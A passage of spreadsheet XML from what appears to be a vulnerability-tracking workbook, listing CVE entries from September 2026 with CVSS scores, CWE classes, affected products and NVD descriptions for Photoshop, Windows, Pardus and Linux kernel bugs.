      <c r="C348" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82005</t>
        </is>
      </c>
      <c r="D348" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E348" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F348" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G348" s="5" t="inlineStr"/>
      <c r="H348" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I348" s="5" t="inlineStr"/>
      <c r="J348" s="5" t="inlineStr"/>
      <c r="K348" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L348" s="5" t="inlineStr"/>
      <c r="M348" s="5" t="inlineStr"/>
      <c r="N348" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O348" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P348" s="5" t="inlineStr"/>
      <c r="Q348" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R348" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S348" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82005</t>
        </is>
      </c>
    </row>
    <row r="349">
      <c r="A349" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B349" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C349" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82006</t>
        </is>
      </c>
      <c r="D349" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E349" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F349" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G349" s="5" t="inlineStr"/>
      <c r="H349" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I349" s="5" t="inlineStr"/>
      <c r="J349" s="5" t="inlineStr"/>
      <c r="K349" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L349" s="5" t="inlineStr"/>
      <c r="M349" s="5" t="inlineStr"/>
      <c r="N349" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O349" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P349" s="5" t="inlineStr"/>
      <c r="Q349" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R349" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S349" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82006</t>
        </is>
      </c>
    </row>
    <row r="350">
      <c r="A350" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B350" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C350" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82007</t>
        </is>
      </c>
      <c r="D350" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E350" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F350" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G350" s="5" t="inlineStr"/>
      <c r="H350" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I350" s="5" t="inlineStr"/>
      <c r="J350" s="5" t="inlineStr"/>
      <c r="K350" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L350" s="5" t="inlineStr"/>
      <c r="M350" s="5" t="inlineStr"/>
      <c r="N350" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O350" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P350" s="5" t="inlineStr"/>
      <c r="Q350" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="R350"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50" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82007</t>
        </is>
      </c>
    </row>
    <row r="351">
      <c r="A351" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B351" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C351" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8301</t>
        </is>
      </c>
      <c r="D351" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E351" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F351" s="5" t="inlineStr">
        <is>
          <t>iletisim@usom.gov.tr</t>
        </is>
      </c>
      <c r="G351" s="5" t="inlineStr"/>
      <c r="H351" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I351" s="5" t="inlineStr"/>
      <c r="J351" s="5" t="inlineStr"/>
      <c r="K351" s="5" t="inlineStr"/>
      <c r="L351" s="5" t="inlineStr"/>
      <c r="M351" s="5" t="inlineStr"/>
      <c r="N351" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O351" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P351" s="5" t="inlineStr"/>
      <c r="Q351" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="R351" s="5" t="inlineStr">
        <is>
          <t>Improper neutralization of special elements used in an OS command ('OS command injection') vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus Boot Repair allows OS Command Injection.
This issue affects Pardus Boot Repair: before 1.0.8.</t>
        </is>
      </c>
      <c r="S351" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8301</t>
        </is>
      </c>
    </row>
    <row r="352">
      <c r="A352" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B352" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C352" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-8303</t>
        </is>
      </c>
      <c r="D352" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E352" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G352" s="5" t="inlineStr"/>
      <c r="H352" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I352" s="5" t="inlineStr"/>
      <c r="J352" s="5" t="inlineStr"/>
      <c r="K352" s="5" t="inlineStr"/>
      <c r="L352" s="5" t="inlineStr"/>
      <c r="M352" s="5" t="inlineStr"/>
      <c r="N352" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O352" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P352" s="5" t="inlineStr"/>
      <c r="Q352" s="5" t="inlineStr">
        <is>
          <t>CWE-266</t>
        </is>
      </c>
      <c r="R352" s="5" t="inlineStr">
        <is>
          <t>Incorrect privilege assignment vulnerability in TUBITAK BILGEM Software Technologies Research Institute Pardus-software allows Privilege Escalation.
This issue affects Pardus-software: before 1.0.5.</t>
        </is>
      </c>
      <c r="S352" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-8303</t>
        </is>
      </c>
    </row>
    <row r="353">
      <c r="A353" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B353" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C353" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83988</t>
        </is>
      </c>
      <c r="D353" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E353" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F353" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G353" s="5" t="inlineStr"/>
      <c r="H353" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I353" s="5" t="inlineStr"/>
      <c r="J353" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K35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53" s="5" t="inlineStr"/>
      <c r="M353" s="5" t="inlineStr"/>
      <c r="N353" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O353" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P353" s="5" t="inlineStr"/>
      <c r="Q353" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R353" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Biometric Service allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S353" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83988</t>
        </is>
      </c>
    </row>
    <row r="354">
      <c r="A354" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B354" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C354" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83990</t>
        </is>
      </c>
      <c r="D354" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E354" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F354" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G354" s="5" t="inlineStr"/>
      <c r="H354" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I354" s="5" t="inlineStr"/>
      <c r="J354" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K354" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L354" s="5" t="inlineStr"/>
      <c r="M354" s="5" t="inlineStr"/>
      <c r="N354" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O354" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P354" s="5" t="inlineStr"/>
      <c r="Q354" s="5" t="inlineStr">
        <is>
          <t>CWE-121</t>
        </is>
      </c>
      <c r="R354" s="5" t="inlineStr">
        <is>
          <t>Stack-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="S354" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83990</t>
        </is>
      </c>
    </row>
    <row r="355">
      <c r="A355" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B355" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C355" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84000</t>
        </is>
      </c>
      <c r="D355" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E355" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F355" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G355" s="5" t="inlineStr"/>
      <c r="H355" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I355" s="5" t="inlineStr"/>
      <c r="J355" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K35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5" s="5" t="inlineStr"/>
      <c r="M355" s="5" t="inlineStr"/>
      <c r="N355" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O355" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P355" s="5" t="inlineStr"/>
      <c r="Q355" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="R355" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Graphics Component allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S355" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84000</t>
        </is>
      </c>
    </row>
    <row r="356">
      <c r="A356" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B356" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C356" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89161</t>
        </is>
      </c>
      <c r="D356" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E356" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G356" s="5" t="inlineStr"/>
      <c r="H356" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I356" s="5" t="inlineStr"/>
      <c r="J356" s="5" t="inlineStr"/>
      <c r="K356" s="5" t="inlineStr">
        <is>
          <t>pcre:pcre2</t>
        </is>
      </c>
      <c r="L356" s="5" t="inlineStr"/>
      <c r="M356" s="5" t="inlineStr"/>
      <c r="N356" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O356" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P356" s="5" t="inlineStr"/>
      <c r="Q356" s="5" t="inlineStr">
        <is>
          <t>CWE-590</t>
        </is>
      </c>
      <c r="R356" s="5" t="inlineStr">
        <is>
          <t>In PCRE2 before 10.48, pcre2_jit_match mishandles a previously copied subject being passed in as a context. An incorrect free operation can occur.</t>
        </is>
      </c>
      <c r="S356" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89161</t>
        </is>
      </c>
    </row>
    <row r="357">
      <c r="A357" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B357" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C357" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89436</t>
        </is>
      </c>
      <c r="D357" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E357" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F357" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G357" s="5" t="inlineStr"/>
      <c r="H357" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I357" s="5" t="inlineStr"/>
      <c r="J357" s="5" t="inlineStr"/>
      <c r="K357" s="5" t="inlineStr"/>
      <c r="L357" s="5" t="inlineStr"/>
      <c r="M357" s="5" t="inlineStr"/>
      <c r="N357" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O357" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P357" s="5" t="inlineStr"/>
      <c r="Q357" s="5" t="inlineStr"/>
      <c r="R357" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: panasonic-laptop: Fix sentinel write past pcc-&gt;sinf[]
acpi_pcc_retrieve_biosdata() rejects SINF packages only when
pcc-&gt;num_sifr is strictly less than hkey-&gt;package.count, then
unconditionally writes a trailing sentinel at
pcc-&gt;sinf[hkey-&gt;package.count]. But pcc-&gt;sinf[] is allocated with
exactly pcc-&gt;num_sifr elements (valid indices 0..num_sifr-1), so that
write needs num_sifr strictly greater than package.count to stay in
bounds -- num_sifr == package.count passes the existing check but
still overflows by one element.
This is exactly the case probe()'s existing num_sifr++ workaround
("Some DSDT-s have an off-by-one bug where the SINF package count is
one higher than the SQTY reported value") is written to accommodate:
when a DSDT's SINF package count equals SQTY+1, the workaround makes
num_sifr equal to package.count, which is precisely the boundary that
overflows here. Found via UBSan (array-index-out-of-bounds) on
hardware where HKEY.SQTY returns 37 and HKEY.SINF()'s package has 38
elements: num_sifr becomes 38 after the += 1 workaround, the loop
correctly fills indices 0..37, and the sentinel write then targets
index 38, one past the end -- a silent 4-byte heap overflow on kernels
without CONFIG_UBSAN.
Tightening the rejection check to num_sifr &lt;= package.count would
avoid the overflow but breaks probe() entirely on exactly this
hardware, since num_sifr == package.count is the case the off-by-one
workaround exists to support. Nothing else in the driver reads this
sentinel value back, so simply skip the write when there is no room
for it instead.</t>
        </is>
      </c>
      <c r="S357" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89436</t>
        </is>
      </c>
    </row>
    <row r="358">
      <c r="A358" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B358" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C358" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89440</t>
        </is>
      </c>
      <c r="D358" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E358" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F358" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G358" s="5" t="inlineStr"/>
      <c r="H358" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I358" s="5" t="inlineStr"/>
      <c r="J358" s="5" t="inlineStr"/>
      <c r="K358" s="5" t="inlineStr"/>
      <c r="L358" s="5" t="inlineStr"/>
      <c r="M358" s="5" t="inlineStr"/>
      <c r="N358" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O358" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P358" s="5" t="inlineStr"/>
      <c r="Q358" s="5" t="inlineStr"/>
      <c r="R358" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mmc: via-sdmmc: stop card-detect handling on probe failure
request_irq() registers the SD card-detect interrupt and the probe enables
it before mmc_add_host() runs. If mmc_add_host() fails, the error path only
unmaps the registers and returns: the interrupt stays registered, so the
handler keeps running against the host once it is freed. via_sdc_isr()
dereferences sdhost and its MMIO base and schedules carddet_work, which
via_sdc_card_detect() also runs against freed memory through its
container_of() dereference.
Add a probe-error path that disables and frees the interrupt and cancels
carddet_work before unmapping. carddet_work can re-enable the device
interrupt via via_reset_pcictrl(), which restores PCIINTCTRL, so mask it
again after cancelling the work.
This issue was found by an in-house static analysis tool and confirmed by
manual code review.</t>
        </is>
      </c>
      <c r="S358" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89440</t>
        </is>
      </c>
    </row>
    <row r="359">
      <c r="A359" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B359" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C359" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89441</t>
        </is>
      </c>
      <c r="D359" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E359" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F359" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G359" s="5" t="inlineStr"/>
      <c r="H359" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I359" s="5" t="inlineStr"/>
      <c r="J359" s="5" t="inlineStr"/>
      <c r="K359" s="5" t="inlineStr"/>
      <c r="L359" s="5" t="inlineStr"/>
      <c r="M359" s="5" t="inlineStr"/>
      <c r="N359" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O359" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P359" s="5" t="inlineStr"/>
      <c r="Q359" s="5" t="inlineStr"/>
      <c r="R359" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
mmc: via-sdmmc: cancel card-detect work on remove
Disabling the device interrupt and freeing the IRQ prevents new card-detect
work from being queued, but carddet_work already queued by the handler can
still run after via_sd_remove() returns. via_sdc_card_detect() recovers the
host through container_of() and dereferences its MMIO base; once remove()
returns the host can be freed, so that work would touch freed memory.
Cancel carddet_work after freeing the IRQ and before cancelling
finish_bh_work, which the card-detect handler can also queue. carddet_work
can re-enable the interrupt through via_reset_pcictrl(); mask it again
afterwards.
This issue was found by an in-house static analysis tool and confirmed by
manual code review.</t>
        </is>
      </c>
      <c r="S359" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89441</t>
        </is>
      </c>
    </row>
    <row r="360">
      <c r="A360" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B360" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C360" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89442</t>
        </is>
      </c>
      <c r="D360" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E360" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F360" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G360" s="5" t="inlineStr"/>
      <c r="H360" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I360" s="5" t="inlineStr"/>
      <c r="J360" s="5" t="inlineStr"/>
      <c r="K360" s="5" t="inlineStr"/>
      <c r="L360" s="5" t="inlineStr"/>
      <c r="M360" s="5" t="inlineStr"/>
      <c r="N360" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O360" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P360" s="5" t="inlineStr"/>
      <c r="Q360" s="5" t="inlineStr"/>
      <c r="R360" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86: ISST: Validate socket ID in clos_assoc ioctl
isst_if_clos_assoc() validates the user-supplied socket_id with
'socket_id &gt; topology_max_packages()', but isst_common.sst_inst[] is
allocated with topology_max_packages() entries, so the valid index range
is [0, topology_max_packages()).  The '&gt;' comparison lets
socket_id == topology_max_packages() pass and index one entry past the
array.
In addition, isst_common.sst_inst[socket_id] is NULL for an in-range
package that has no bound TPMI SST instance, and the pointer is used
without a NULL check.  Both the out-of-bounds entry and the NULL pointer
are then dereferenced by map_partition_power_domain_id() and the
following power_domain_info access.
Reject socket_id &gt;= topology_max_packages() and a NULL sst_inst, matching
the checks already performed by get_instance().</t>
        </is>
      </c>
      <c r="S360" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89442</t>
        </is>
      </c>
    </row>
    <row r="361">
      <c r="A361" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B361" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C361" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89472</t>
        </is>
      </c>
      <c r="D361" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E361" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F361" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G361" s="5" t="inlineStr"/>
      <c r="H361" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I361" s="5" t="inlineStr"/>
      <c r="J361" s="5" t="inlineStr"/>
      <c r="K361" s="5" t="inlineStr"/>
      <c r="L361" s="5" t="inlineStr"/>
      <c r="M361" s="5" t="inlineStr"/>
      <c r="N361" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O361" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P361" s="5" t="inlineStr"/>
      <c r="Q361" s="5" t="inlineStr"/>
      <c r="R361" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
power: supply: charger-manager: register regulators before exposing sysfs
charger_manager_remove() and the err_reg_extcon probe error path free each
charger regulator with regulator_put() before tearing down the power_supply
sysfs entries (power_supply_unregister()). charger_manager_remove() also
calls try_charger_enable(cm, false) after the regulator_put() loop. A
concurrent write to a charger's externally_control sysfs attribute that
lands between regulator_put() and power_supply_unregister() can run
charger_externally_control_store() and call try_charger_enable(), which,
when charging is enabled, dereferences the already-freed consumer handle.
When charging is enabled, try_charger_enable(cm, false) in .remove() also
dereferences the freed handles directly. Both leave use-after-free windows.
Symmetrically, probe registers the sysfs entries (power_supply_register)
before acquiring the regulators (regulator_get, inside
charger_manager_register_extcon), so userspace can reach externally_control
before the regulators are available.
Split charger_manager_register_extcon() on the sync/async boundary:
charger_manager_get_regulators() (regulator_get only, no async producer)
now runs before power_supply_register() so sysfs is not live before
regulators are available, and charger_manager_register_extcon() keeps only
the extcon notifier/work setup, still after power_supply_register() so a
power_supply_register() failure cannot reach extcon setup. This keeps the
sysfs setup/teardown ordering symmetric without introducing an asynchronous
producer on the earlier probe-error path.
Move power_supply_unregister() and try_charger_enable(cm, false) ahead of
the regulator_put() loop on both teardown paths, and adjust err_reg_extcon
(power_supply_unregister() then fall through err_regulator for
regulator_put(); get_regulators self-rolls back on its own failure).
This does not address the separate extcon-notifier-driven deref of the same
handles, which needs its own synchronization design.
Found by an in-house static analysis tool.</t>
        </is>
      </c>
      <c r="S361" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89472</t>
        </is>
      </c>
    </row>
    <row r="362">
      <c r="A362" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B362" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C362" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89486</t>
        </is>
      </c>
      <c r="D362" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E362" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F362" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G362" s="5" t="inlineStr"/>
      <c r="H362" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I362" s="5" t="inlineStr"/>
      <c r="J362" s="5" t="inlineStr"/>
      <c r="K362" s="5" t="inlineStr"/>
      <c r="L362" s="5" t="inlineStr"/>
      <c r="M362" s="5" t="inlineStr"/>
      <c r="N362" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O362" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P362" s="5" t="inlineStr"/>
      <c r="Q362" s="5" t="inlineStr"/>
      <c r="R362" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipmi: Fix use-after-free of cmd_rcvr in _ipmi_destroy_user()
Commit 9e91f8a6c868 ("ipmi:msghandler: Remove srcu for the
ipmi_interfaces list") dropped the synchronize_rcu() between unlinking
the command receivers from intf-&gt;cmd_rcvrs and freeing them, updating
only the comment that explains why the barrier is needed.
The cmd_rcvrs list is still traversed under plain RCU: find_cmd_rcvr()
walks it inside rcu_read_lock(), and handle_ipmb_get_msg_cmd() borrows
rcvr-&gt;user from that lookup within the same read-side section. Without
the grace period, _ipmi_destroy_user() can kfree() a cmd_rcvr while a
reader still holds a pointer to it, causing a use-after-free.
The rework only made srcu unnecessary for the interfaces list; the
cmd_rcvrs list still relies on plain RCU. Restore the synchronize_rcu()
before freeing the receivers.</t>
        </is>
      </c>
      <c r="S362" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-89486</t>
        </is>
      </c>
    </row>
    <row r="363">
      <c r="A363" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B363" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C363" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-89487</t>
        </is>
      </c>
      <c r="D363" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E363" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F363" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
